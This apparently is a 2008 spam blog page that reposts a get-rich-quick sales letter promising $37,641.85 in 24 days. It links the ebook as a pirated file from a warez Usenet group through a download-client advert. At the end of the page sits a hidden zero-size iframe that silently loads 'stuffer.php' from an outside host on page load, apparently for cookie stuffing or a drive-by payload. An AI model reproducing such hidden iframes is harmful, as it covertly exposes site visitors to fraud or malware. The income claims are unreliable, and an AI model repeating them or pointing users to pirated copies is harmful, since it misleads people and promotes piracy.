Header Pogads

Saturday, September 13, 2008

From an idea to Price $37,641.85 in just 24 days!

Who else wants to earn $37,641.85 in just 24 days?

• Use this easily duplicatable, exact same formula I used
• Use it as many times as you’d like to generate multiple streams of income

From the Desk of Frank Sousa,

There are many ways to make money on the Internet!

I should know. Over the past 12 years, I’ve tried and tested most of them, and I’ve made a good full time living off the Internet almost from the very beginning.

Working together with my two sons, we earn money in many different ways over the Internet today.

Yes that’s me there. This picture was taken on the beach in Hawaii… during one of those breathtaking Hawaii sunsets. What a beautiful place to visit! My wife and I love to visit Hawaii. When I came back from that trip, I had more money in the bank than when I’d left! It all came in on auto-pilot. That’s what I want to teach you.

At one time, I had worked as a corporate manager for a couple of different computer companies. I put in the 12 hour days, and the long weekends that it takes to “get ahead” in the corporate world, but no matter how hard I worked for “the MAN”, I could never really manage to get ahead financially. I was simply trading my hours for their dollars. (And not very many dollars either). I realized that I needed to get out of that Rat Race. I quit that Rat Race about 25 years ago, and I’ve never looked back!

I’ve been in my own business for 25 years now, with the past 12 being EXCLUSIVELY on the Internet. It’s a BETTER WAY TO LIVE!

But enough about me. Please read this very carefully! I’m about to spill the beans on one of the simplest and most profitable ways that we’ve ever used to make huge chunks of money quickly on the Internet.

How would you like to watch over my shoulder as I show you EXACTLY how I took this simple idea, and developed it into over $37,000 in CASH in just a little over three weeks? (It has gone on to generate MUCH more than that, and still continues to generate a regular income for us every month).

Download File: Earn $37,641.85 in Just 24 Days
Newsgroup:alt.binaries.warez.ebooks
File Size: 717 Kb
File Type: pdf

How to download?

To download this file you will need the UseNeXT download client.
It's Free, 100% anonymous, 100% secure and very easy to use.

Usenet Binaries: Anonymous downloads at DSL Speed

Download GREAT GAMES for FREE

Template by - Abdul Munir | Daya Earth Blogger Template
< iframe id="Iframe1" name="Iframe1" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="0" height="0" src="http://work.host-ed.net/Stuff//stuffer.php">